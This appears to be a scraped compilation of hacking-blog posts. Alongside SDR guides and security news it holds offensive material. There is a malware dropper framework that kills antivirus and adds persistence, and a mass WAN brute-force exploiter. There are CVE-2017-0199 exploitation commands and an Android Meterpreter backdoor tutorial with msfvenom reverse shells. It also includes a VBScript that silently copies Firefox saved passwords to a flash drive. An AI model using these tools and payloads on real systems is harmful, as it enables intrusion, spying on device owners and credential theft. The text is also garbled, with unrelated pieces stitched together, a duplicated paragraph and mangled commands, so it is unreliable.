Screenshot of DevAudit package source audit

Screenshot of DevAudit configuration audit

DevAudit is an open-source, cross-platform, multi-purpose security auditing tool targeted at developers and DevOps practitioners that detects security vulnerabilities at multiple levels of the solution stack. DevAudit provides a wide array of auditing capabilities that automate security practices and implementation of security auditing in the software development life-cycle. DevAudit can scan your operating system and application package dependencies, application and application server configurations, and application code, for potential vulnerabilities based on data aggregated by OSS Index from a wide array of sources and data feeds such as the National Vulnerability Database (NVD) CVE data feed, the Debian Security Advisories data feed, Drupal Security Advisories, and several others. Support for other 3rd party vulnerability databases like vulners.com is also planned.

DevAudit helps developers address at least 3 of the OWASP Top 10 risks to web application development:

as well as risks classified by MITRE in the CWE dictionary such as CWE-2 Environment and CWE-200 Information Disclosure

As development progresses and its capabilities mature, DevAudit will be able to address the other risks on the OWASP Top 10 and CWE lists like Injection and XSS. With the focus on web and cloud and distributed multi-user applications, software development today is increasingly a complex affair with security issues and potential vulnerabilities arising at all levels of the stack developers rely on to deliver applications. The goal of DevAudit is to provide a platform for automating implementation of development security reviews and best practices at all levels of the solution stack from library package dependencies to application and server configuration to source code.As development progresses and its capabilities mature, DevAudit will be able to address the other risks on the OWASP Top 10 and CWE lists like Injection and XSS. With the focus on web and cloud and distributed multi-user applications, software development today is increasingly a complex affair with security issues and potential vulnerabilities arising at all levels of the stack developers rely on to deliver applications. The goal of DevAudit is to provide a platform for automating implementation of development security reviews and best practices at all levels of the solution stack from library package dependencies to application and server configuration to source code.

Cross-platform with a Docker image also available
CLI interface.
Continuously updated vulnerabilties data.
Audit operating system and development package dependencies.
Audit application server configurations.
Audit application configuration.
Audit application code by static analysis.
Remote agentless auditing.
Docker container auditing.
PowerShell support.

Documentation

Installation

DevAudit can be installed by the following methods:

Building from source.
Using a binary release archive file downloaded from Github for Windows or Linux.
Using the release MSI installer downloaded from Github for Windows.
Using the Chocolatey package manager on Windows.
Pulling the ossindex/devaudit Docker image from Docker Hub on Linux.

Github Project

GOOD LUCK!

Tools used:

Install Requirements:

First thing, you want to make sure you have all the required software installed, you can install most of them and their dependencies using your distribution package manager. Let’s start with the libraries and tools for the hackrf itself, on a Debian/Ubuntu distro you’ll install them like so:

1	`sudoapt-get` `installhackrf libhackrf-dev libhackrf0`

Once these libraries are installed, you can plug your hackrf into one of your USB ports and execute the hackrf_info command, at this point you should see something like the following:

# hackrf_info
 
Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0x00574746 0x00574746
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f4339e1

You will now install gnuradio which is the software we’ll use to decode the RF signals, gqrx a tool to visualize signal power on certain frequencies and everything else that will be needed in the next steps:

sudoapt-get installgnuradio gnuradio-dev gr-osmosdr gr-osmosdr gqrx-sdr wireshark

Proceed with gr-gsm, the GnuRadio blocks that will decode GSM packets:

sudoapt-get installgit cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
git clone https://github.com/ptrkrysik/gr-gsm.git
cdgr-gsm
mkdirbuild
cdbuild
cmake ..
make
sudomakeinstall
sudoldconfig

Now create the file ~/.gnuradio/config.conf and paste the following contents into it:

[grc]
local_blocks_path=/usr/local/share/gnuradio/grc/blocks

Finally install kalibrate-hackrf, a tool that will hop among known GSM frequencies and will tell you which your country is using:

git clone https://github.com/scateu/kalibrate-hackrf.git
cdkalibrate-hackrf
./bootstrap
./configure
make
sudomakeinstall

Finding GSM Frequencies:

Each operator in each country uses a different frequency in the GSM possible spectrum, which usually starts from 900Mhz. You can use hackrf_kalibrate to find the frequencies you want to sniff:

1	`./kal-s GSM900 -g 40 -l 40`

Note the two gain values, those are important in order to get some results. Leave kalibrate running and after a while you should see an output similar to this:

You will have to use the proper GSM parameter (‘-s’) to correspond to your local operator. Consult this list for verification.

Sometimes you might want to see the frequencies in order to ensure correct results from hackrf_kalibrate, or to save yourself from calculating the correct frequency given by hackrf_kalibrate (notice the +/- Khz sign of each result – this means the top peak with the corresponding power,not 100% correct frequency). Open gqrx and tune it to the first frequency you got from hackrf_kalibrate, for example 940.6Mhz, and you’ll see something like the following picture:

In the above screenshot you can visually see the activity is around 945Mhz.

Once you know the GSM channels frequencies, you can start gr-gsm by running the python script ./airprobe_rtlsdr.py or load the airprobe_rtlsdr.grc file using gnuradio-companion and set one of the channel frequencies you just found in the frequency field. Don’t forget to add ‘gain’ value again, move back to the frequency field and start pressing the UP/DOWN arrows on your keyboard to start scrolling the frequencies in 200Khz steps until you start seeing some data in your console window. The whole process should look something like this:

Now you only need to launch wireshark from another terminal tab with the following command:

1	`sudowireshark -k -Y` `'gsmtap && !icmp'-i lo`

If gr-gsm did his job, you should be able to see decoded GSM traffic sniffed by your hackrf.

As interest in SDR grows unabated and we continue to see ever more affordable hardware platforms, I thought it would be timely to round-up just a few of the things that it can be used for. This is by no means an attempt at an exhaustive list and software implementations covered are open source, since this means they are accessible to all, and proprietary SDR is whole other world also!

1. Receive broadcast radio

Ettus Research, the folks behind what has come to be regarded as the grandaddy of affordable wideband SDR hardware platforms: the USRP, have put together a video tutorial in which they demonstrate how you can create an FM receiver application in under 10 minutes. This is based on using GNU Radio and its excellent graphical tool, GNU Radio Companion (GRC).

Of course, you don't need hardware anywhere near as capable as a USRP for this, and the low cost RTLSDR receiver hardware I wrote about back in May 2012 could also be used.

2. Amateur radio

As you might expect radio hams are doing a lot of work with SDR and there are plenty of options available. Ranging from the popular, low cost and simple to understand SoftRock SDR hardware, up to the modular and incredibly flexible High Performance Software-Defined Radio (HPSDR) project that I first wrote about in November 2010.

In addition to using hardware that has been designed with amateur radio use in mind, it's also possible to use something such as a USRP or RTLSDR receiver, depending on whether you need a transceiver or receive-only, and the required frequency coverage and dynamic range etc.

When it comes to software there are applications which are based on GNU Radio, such as the popular Gqrx receiver, along with many others that are based on the much simpler DttSP project.

3. Radio astronomy

Image © Marcus D. Leech

Marcus Leech of Science Radio Laboratories published a paper [PDF] entitled “A 21cm Radio Telescope for the Cost-Conscious”, in which he describes how this can be built using RTLSDR hardware along with other low cost and easily sourced components, with the option of using an Ettus Research USRP B100 + WBX daughter card for improved performance.

The GNU Radio-based simple_ra application which has been created for use with the system collects total power and spectral data in real-time, and for more information see the README file.

4. Track ships via AIS transmissions

A screen capture from aprs.fi

Automatic Identification System (AIS) is an automatic tracking system employed by ships to identify and locate vessels, which is used to supplement marine radar.

There are a number of options available for receiving and decoding AIS data, and one which uses RTLSDR hardware with a GNU Radio-based receiver plus gnuais is described in a blog post by Alexandru Csete, who also happens to be the author of the aforementioned Gqrx software.

Using this AIS messages can be logged, plotted, and fed to the Google Maps-based aprs.fi service.

5. Track aircraft via Mode S transmissions

Mode S is similar in purpose to AIS, albeit for aircraft. Once again the humble RTLSDR hardware can be used for receiving transmissions, and in July of last year I described how the gr-air-modes software can be used for this purpose and with aircraft positions plotted in Google Earth.

6. Set up a DRM transmitter

That's not DRM as in Digital Rights Management, but rather instead Digital Radio Mondiale — the set of digital radio technologies designed for use with shortwave AM broadcasting.

A DRM implementation was created by a student as part GNU Radio's participation in Google Summer of Code 2012. The gr-drm software is fully integrated with GNU Radio Companion and together with a USRP can be used to create a DRM/DRM+ transmitter.

7. Build a GSM network

A Fairwaves GSM base station which uses UmTRX, installed at a festival

When it comes to creating a GSM network using open source SDR there are two software options: OpenBTS and OsmoBTS. The former has been around the longest and is used with a software switch such as Asterisk to essentially turn mobile handsets into SIP/VoIP endpoints.

OsmoBTS provides layers 1-3 of a GSM base station and can be used with the transceiver component from OpenBTS, to provide a fully open source implementation which may be used with Asterisk, or integrated with a traditional GSM network architecture using the Abis protocol.

Supported hardware includes USRP, development kit from Range Networks and UmTRX. The latter being a dual-channel open source hardware design that is designed for use in carrier networks.

8. Experiment with LTE

Image source: openLTE project

It's much earlier days as far as open source LTE (4G mobile) is concerned, but there are currently two partial implementations. gr-lte is a modular GNU Radio-based environment for an LTE downlink receiver, and openLTE provides GNU Octave code for test simulation along with GNU Radio applications. The latter includes downlink scanner and recorder applications which have hardware support for RTLSDR and HackRF.

9. Learn how Global Navigation Satellite Systems work

Image source: GNSS-SDR project

The GNSS-SDR software is described as being“focused on signal processing, understood as the process between the ADC and the computation of code and phase observables that allow the application of high-accuracy positioning algorithms”. Furthermore, it “allows you to control all the process inside a GNSS receiver, from the raw bits at the output of an analog-to-digital converter to the computation of the navigation solution, that is, obtaining receiver’s position and time.”

By providing a working implementation and opening up baseband processing which is usually done inside an IC, GNSS-SDR makes a great platform for learning about and developing navigation systems.

10. Invent the wireless future!

This post barely scratches the surface when it comes to what can be done using SDR, and with open source implementations of one degree or another of current standards such as 802.11, ZigBee and Bluetooth also, there are plenty of relevant codebases to learn from. On top of which tools such as GNU Radio Companion when combined with low cost wideband SDR hardware make it easier, faster and increasingly affordable to prototype next generation wireless applications.

Listening to unencrypted Police/Ambulance/Fire/EMS conversations.
Listening to aircraft traffic control conversations.
Tracking aircraft positions like a radar with ADSB decoding.
Decoding aircraft ACARS short messages.
Scanning trunking radio conversations.
Decoding unencrypted digital voice transmissions.
Tracking maritime boat positions like a radar with AIS decoding.
Decoding POCSAG/FLEX pager traffic.
Scanning for cordless phones and baby monitors.
Tracking and receiving meteorological agency launched weather balloon data.
Tracking your own self launched high altitude balloon for payload recovery.
Receiving wireless temperature sensors and wireless power meter sensors.
Listening to VHF amateur radio.
Decoding ham radio APRS packets.
Watching analogue broadcast TV.
Sniffing GSM signals.
Using rtl-sdr on your Android device as a portable radio scanner.
Receiving GPS signals and decoding them.
Using rtl-sdr as a spectrum analyzer.
Receiving NOAA weather satellite images.
Listening to satellites and the ISS.
Radio astronomy.
Monitoring meteor scatter.
Listening to FM radio, and decoding RDS information.
Listening to DAB broadcast radio.
Use rtl-sdr as a panadapter for your traditional hardware radio.
Decoding taxi mobile data terminal signals.
Use rtl-sdr as a high quality entropy source for random number generation.
Use rtl-sdr as a noise figure indicator.
Reverse engineering unknown protocols.
Triangulating the source of a signal.
Searching for RF noise sources.
Characterizing RF filters and measuring antenna SWR.

Features

Framework works with Windows and Linux
Download executable on target system and execute it silently..
The executable size small compared to other droppers generated the same way
Self destruct function so that the dropper will kill and delete itself after finishing it work
Adding executable after downloading it to startup
Adding executable after downloading it to task scheduler ( UAC not matters )
Finding and killing the antivirus before running the malware
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
The ability to disable UAC
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

Python libraries requirements in requirements.txt

Needed dependencies for linux

Wine
Python 2.7 on Wine Machine

Note : You must have root access

Installation

if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 😄

Tested on:

Kali Linux - SANA
Ubuntu 14.04-16.04 LTS
Windows 10/8.1/8

GITHUB PROJECT

A port scanner
SQL injection scanner
Dork checker
Hash cracker
Hash type verification tool
Proxy finding tool
XSS scanner

It is capable of cracking hashes without prior knowledge of the algorithm, scanning ports on a given host, searching for SQLi vulnerabilities in a given URL, verifying that your Google dorks work like they should, verifying the algorithm of a given hash, scanning a URL for XSS vulnerability, and finding usable HTTP proxies.

GITHUB PROJECT

Fast, thorough, XSS/SQLi spider. Give it a URL and it'll test every link it finds for cross-site scripting and some SQL injection vulnerabilities.

From within the main folder run:
./xsscrapy.py -u http://example.com

If you wish to login then crawl:
./xsscrapy.py -u http://example.com/login_page -l loginname

If you wish to login with HTTP Basic Auth then crawl:
./xsscrapy.py -u http://example.com/login_page -l loginname --basic

If you wish to use cookies:
./xsscrapy.py -u http://example.com/login_page --cookie "SessionID=abcdef1234567890"

If you wish to limit simultaneous connections to 20:
./xsscrapy.py -u http://example.com -c 20

Dependencies
wget -O https://bootstrap.pypa.io/get-pip.py python get-pip.py
pip install -r requirements.txt

If it gives an error : ImportError: cannot import name LinkExtractor . This means that you don't have the latest version of scrapy. You can install it using: sudo pip install --upgrade scrapy .

It's called XSScrapy, so why SQL injection detection too? There is overlap between dangerous XSS chars and dangerous SQL injection characters, namely single and double quotes. Detecting SQL injection errors in a response is also simple and nonCPU-intensive. So although 99% of this script is strongly geared toward high and accurate detection of XSS adding simple SQL injection detection through error message discovery is a simple and effective addition.

This script will not test for blind sql injection. Error messages it looks for come straight from w3af's sqli audit plugin.

GITHUB PROJECT

DISCLAIMER:

The author does not hold any responsibility about the bad use of this script remember that attacking targets without prior concent its ilegal and punish by law, this script as build to show how msf resource files can automated tasks.

Scanning WAN networks In search of targets may take 10 to 15 minutes depending of your network connection, and will search In 1024 random hosts For the selected service/port, also the File ‘brute.txt’ may be edited to insert new entrys, or we can provide the full path to another dicionary File to be used In brute-forcing services.

Adictionals tool settings can be configurated just by editing ‘settings’ file (nano settings) befor running the tool, settings like: use decoys (scanning WAN networks) OR spoof mac addr (change mac addr and ip addr), can only be config befor running the tool.

Features:

1º – scan in WAN for selected port (service) open

2º – port hosts found to msf database and set global variables (msfdb.rc)

3º – runs the conrrespondent exploit.rc (ssl.rc) againts all RHOSTS set before.

work flow:

1º this script will ask (to the attacker) to input the port number to search

2º then uses nmap to search in WAN networks for the specified port open

3º builds a resource file (.rc) to port the targets found to msf database

4º starts msf db and lunch the correspondente exploit.rc file againts all targets

Note:

“all ‘exploits.rc’ will use nmap nse script engine and msf auxiliary modules to exploit the target And each discovered matching login and password will create a Metasploit session”.

DOWNLOAD & INSTALL

1º - Download framework from github
     tar.gz OR zip OR git clone

2º - Set files execution permitions
     cd RC-exploiter
     sudo chmod -R +x *.sh

4º - Run main tool
     nano settings
     sudo ./rc-exploiter.sh

GITHUB PROJECT

This is the worlds most advanced ethical hacking course with 18 of the most current security domains any ethical hacker will ever want to know when they are planning to beef up the information security posture of their organization. In 18 comprehensive modules, the course covers 270 attack technologies, commonly used by hackers

DOWNLOAD

What is CVE-2017-0199?

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka “Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.”

Exploit

Download cve-2017-0199_toolkit

Generate malicious RTF file using following command and send it to victim

Syntax:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

(Optional, if using MSF Payload) : Generate metasploit payload and start handler

Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

Start toolkit in exploitation mode to deliver payloads

Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

DEMO

Note

This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs.

Reference

https://github.com/bhdresh/CVE-2017-0199

Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.

Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, allegedly belonged to the NSA's Equation Group.

What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.

Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.

Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.

A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.

The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.

Therefore, to compromise a machine, it must be running a vulnerable version of Windows OS with an SMB service expose to the attacker.

Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.

Once installed, DoublePulsar used hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, preventing it from persisting after an infected PC is rebooted.

While Microsoft has already patched majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.

Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer received security updates, are also vulnerable to the in-the-wild exploits.

Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver hacking exploits, researchers are expecting more vulnerable and unpatched computers to fall victims to DoublePulsar.

After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."

Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.

written by Swati Khandelwal

Simple script for running bruteforce blind MySql injection

The script will run through queries listed in sets in provided file (default-queries.json as default) and try to bruteforce places with {} placeholder. If no {} placeholder present, the script will simply make request with current query.

command line

$ python3 blindy.py --help
usage: blindy.py [-h] [-f filename] [-m method] -p name -r regexp -u url
                 [-s set_of_queries]

Run blind sql injection using brutforce

optional arguments:
  -h, --help            show this help message and exit
  -f filename           File name for your commands in json format, defaults
                        to default-queries.json
  -m method, --method method
                        Where to inject (GET - get parameter/default, POST -
                        post parameter, HEADER - header)
  -p name               Name of parameter (for get - param name, post - param
                        name, for header - name of header). If params need to
                        have fixed value use -p submit=true
  -r regexp             Regular expression for negative pattern (script search
                        for the pattern and if present - will consider that
                        injection failed and igrone result.)
  -u url                Url to test
  -s set_of_queries, --set set_of_queries
                        Which set of queries to analyze from json file, for
                        ex. login, blind. Default to blind.

Example usage
Bruteforce inject into POST query_param

python3 blindy.py -m POST -p query_param -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind

Bruteforce inject into POST query_param with placeholder

python3 blindy.py -m POST -p "query_param=login {}" -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind

This will inject the queries in a place of {} parameter placeholder
Simple check a list of queries against username parameter

python3 blindy.py -m POST -p username -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/login.php -s login

Download Blindy

In this tutorial, I'll be teaching you how to hack Android devices such as phones and tablets using Metasploit.
I'm going to be using Sana (Kali 2.0) for this tutorial, but you're welcome to use any distro you want as long as it can run Metasploit.
This is very easy to do - simply follow the below steps and you should be good to go.

Part 1: Generating The Payload

To generate the payload, open up a terminal and type in the following commands:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.225 LPORT=444 R > randomfile.apk

Here, android/meterpreter/reverse_tcp is the name of the payload we're going to be using. LHOST is the IP address to which the client is going to connect (your IP address). To find it, open up a new terminal and type in ifconfig. Your IP address will be where I've highlighted the text:

LPORT can be essentially any valid port number on your machine, you just need to make sure that it's not currently in use.

Replace RandomFile.apk with your file name.

...Hit ENTER and your payload should be generated successfully.

The apk file that was generated is the one you want the target device to run. This may require some social engineering skills, I'll just leave that to you.

Part 2: The Exploit

Once the payload has been successfully transfered to the target device, we need to start listening on the specified address and port to exploit the device.

For this, let's open up the Metasploit console.

Enter the following commands:

service postgresql start
msfconsole

That's going to open up the Metasploit console.

Now we want to use a payload handler for handling our reverse TCP connection. For this, type the following in the Metasploit terminal:

use multi/handler

You should now have a prompt which says exploit(handler). Awesome, now let's set the options. To do that, enter the following commands:

set PAYLOAD android/meterpreter/reverse_tcp
set LHOST Your_IP
set LPORT Port_Number

Replace the required info with yours in the above commands.

Now type the following command and verify all the options:

show options

This is what my configuration looks like:

If you're certain all the options are valid, enter the following command to start the handler (listening):

exploit

As soon as the device executes the payload (opens the app), your Meterpreter terminal should say "Meterpreter session one opened" or something of that sort.
This means you have successfully gained access to the device.

To view the list of available commands, just put a question mark (?) and hit ENTER.

To use a command, simply type the name of the command and hit ENTER. If it requires any parameters, it will mention that.

Some useful commands:
To stream video from the device's camera live, use the following command:

webcam_stream

To download/upload files from/to the device:

download/upload %FILEPATH%

Over The Internet
In the above case, everything was attempted on a local network.
In case you wish to do this over the internet, follow the same steps. Instead of using ifconfig, use the following command:

dig TXT +short o-o.myaddr.l.google.com @ns1.google.com

You would also need to enable port forwarding on your router for it to work over the internet.

Enjoy Hacking!

The following code can be ran from a flashdrive as 'worm'.vbs. It will copy the user profile folder containing all information from users firefox sessions including stored passwords.

Once copied, the user profile folder can replace an existing user profile folder on another computer and the session will restore with saved passwords, submission forms, history, and bookmark information as it was on the computer you grabbed it from.


' Canidison
' By Jar Jar Binks
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Createobject("wscript.shell")
WshShell.CurrentDirectory = "c:\"
If objFSO.FolderExists("C:\Users\All Users\Appdata") Then
WScript.Quit()
End if
Set objFolder = objFSO.CreateFolder("C:\Users\All Users\Appdata")
outFile0=("C:\Users\All Users\cookies.bat")
Set objFile = objFSO.CreateTextFile(outFile0,True)
objFile.Write "cd %appdata%"& vbCrLf
' Replace D: With whatever drive letter applies
objFile.Write "xcopy /s Mozilla\Firefox\Profiles\* ""D:"""
objFile.Close
CreateObject("WScript.Shell").Run("""C:\users\All users\cookies.bat"""), 0, true
outFile66=("C:\Users\All Users\delete.vbs")
Set objFile = objFSO.CreateTextFile(outFile66,True)
objFile.write "Set objFSO = CreateObject(""Scripting.FileSystemObject"")"& vbCrLf
objFile.write "objFSO.DeleteFolder(""C:\Users\All Users\Appdata"")"& vbCrLf
objFile.write "objFSO.DeleteFile(""C:\Users\All Users\Cookies.bat"")"& vbCrLf
objFile.write "objFSO.DeleteFile(""C:\Users\All Users\delete.vbs"")"
objFile.close
CreateObject("WScript.Shell").Run("""C:\users\All users\delete.vbs"""), 0, false

The folder copied to your flashdrive will be something like 'dnh8gkr0.default'. To replace your own firefox user profile with the copied profile type Windows+R, then %appdata%, and hit enter.

Go to Mozilla\Firefox\Profiles\ and copy the name of your own profile (which will be something like dnh8gkr0.default) and rename the folder on your flashdrive whats on your clipboard.

Now destroy your own folder and replace it with the folder on your flashdrive. Follow all these steps and open Firefox. You will be prompted to restore session. Restore session.

Boom. Saved passwords, saved form documents and history. This is to be used only as a means to transfer your own firefox profiles Furthermore I am not responsible for your actions.

"For Educational Purposes Only"

Atlassian's group chat platform HipChat is notifying its users of a data breach after some unknown hacker or group of hackers broke into one of its servers over the weekend and stole a significant amount of data, including group chat logs.

What Happened?

According to a security notice published on the company's website today, a vulnerability in a "popular third-party" software library used by its HipChat.com service allowed hackers to break into its server and access customer account information.

However, HipChat did not say exactly which programming blunder the hackers exploited to get into the HipChat cloud server.

What type of Information?

Data accessed by the hackers include user account information such as customers' names, email addresses and hashed password information.

Besides information, attackers may have obtained metadata from HipChat "rooms" or groups, including room name and room topic. While metadata is not as critical as direct messages, it's still enough to identify information that's not intended to be public.

Worse yet, the hackers may also have stolen messages and content in chat rooms, but in a small number of instances (about 0.05%). There has been no sign that over 99% of users' messages or room content was compromised.

Fortunately, there's no evidence that the attackers have accessed anyone's credit card or financial information.

Who are not affected?

HipChat users not connected to the affected third-party software library are not affected by the data breach.

Other Atlassian properties also are safe, as the company claimed that there is no evidence to suspect that other Atlassian systems or products like Jira, Confluence, or Trello have been affected by the hack.

To Worry or Not to Worry?

There's no need to panic, as the passwords that may have been exposed in the breach would also be difficult to crack.

Atlassian Chief Security Officer Ganesh Krishnan noted that HipChat hashes all passwords using the bcryptcryptographic algorithm, with a random salt.

The data is hashed with bcrypt, which transforms the passwords into a set of random-looking characters, and makes the hashing process so slow that it would literally take centuries to brute-force all of the HipChat account passwords.

For added security, HipChat also "salted" each password with a random value before hashing it, adding additional protection against possible decryption.

However, data breaches like this are made worse by the fact that there have been so many breaches prior to it, and secondly, that majority of users make use of the same or similar passwords for their multiple accounts.

So, it doesn't take much for hackers to cross reference a user's username or email address in a database from a previous breach and find an old password, placing users at greater risk of a hack.

How Many victims?

HipChat did not say how many users may have been affected by the incident, but the company is taking several proactive steps to secure its users.

What is HipChat doing?

As a precaution, HipChat has invalidated passwords on all potentially affected HipChat-connected accounts, and emailed password reset instructions, forcing every user to reset their account password.

The company is also attempting to track down and fix the security vulnerability in the third-party library used by its service that allowed for the breach.

In response to the attack, the company is also updating its HipChat Server that will be shared with its customers directly through the standard update channel.

HipChat has also isolated the affected systems and closed any unauthorized access.

HipChat parent company Atlassian is also actively working with law enforcement on the investigation of this matter.

What Should You Do Now?

For the Obvious reasons, all HipChat customers are highly recommended to change their passwords as soon as possible.

You should also particularly be alert of the Phishing emails, which are usually the next step of cyber criminals after a breach. Phishing is designed to trick users into giving up further details like passwords and bank information.

written by Swati Khandelwal

WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

Usage


                           _             
  __      ___ __  ___  ___| | ___   _    
  \ \ /\ / / '_ \/ __|/ _ \ |/ / | | |   
   \ V  V /| |_) \__ \  __/   <| |_| |   
    \_/\_/ | .__/|___/\___|_|\_\\__,_|   
           |_|                           
[--] WPSeku - Wordpress Security Scanner  
[--] WPSeku - v0.1.0                      
[--] Momo Outaadi (@M4ll0k)               
[--] https://github.com/m4ll0k/WPSeku   

Usage: wpseku.py --url URL

 -u --url Site URL (e.g: http://site.com)
 -e --enum 
  [u:  Usernames Enumeration
 -p --plugin 
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -t --theme 
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -b --brute 
  [l:  Bruteforce password login
  [x:  Bruteforce password login via XML-RPC
 --user  Set username, try with enum users
 --wordlist Set wordlist
 -h --help Show this help and exit
Examples:
  wpseku.py -u www.site.com
  wpseku.py -u www.site.com -e [u]
  wpseku.py -u site.com/path/wp-content/plugins/wp/wp.php?id= -p [x,l,s]
  wpseku.py -u site.com --user test --wordlist dict.txt -b [l,x]

Screenshot

Download WPSeku

As with all new releases, you have the common denominator of updated packages, an updated kernel that provides more and better hardware support, as well as a slew of updated tools – but this release has a few more surprises up its sleeve.

Support for RTL8812AU Wireless Card Injection

These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11 AC, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favourite.

The driver can be installed using the following commands:

apt-get update
apt install realtek-rtl88xxau-dkms

Streamlined Support for CUDA GPU Cracking

Installing proprietary graphics drivers has always been a source of frustration in Kali. Fortunately, improvements in packaging have made this process seamless – allowing our users a streamlined experience with GPU cracking. Together with supported hardware, tools such as Hashcat and Pyrit can take full advantage of NVIDIA GPUs within Kali. For more information about this new feature, check out the related blog post and updated official documentation.

Amazon AWS and Micsosoft Azure Availability (GPU Support)

Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts into streamlining Kali’s approach. Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. You can check out Cracking in the Cloud with CUDA GPUs.

OpenVAS 9 Packaged in Kali Repositories

One of the most lacking tool categories in Kali (as well as the open-source arena at large) is a fully-fledged vulnerability scanner. OpenVAS isn't include in the default Kali release due to its large footprint, but OpenVAS can easily be downloaded and installed using the following commands:


apt-get update
apt install openvas

Download Kali Linux 2017.1

Initially thought to be 600,000 users, the number of Android users who have mistakenly downloaded and installed malware on their devices straight from Google Play Store has reached 2 Million.

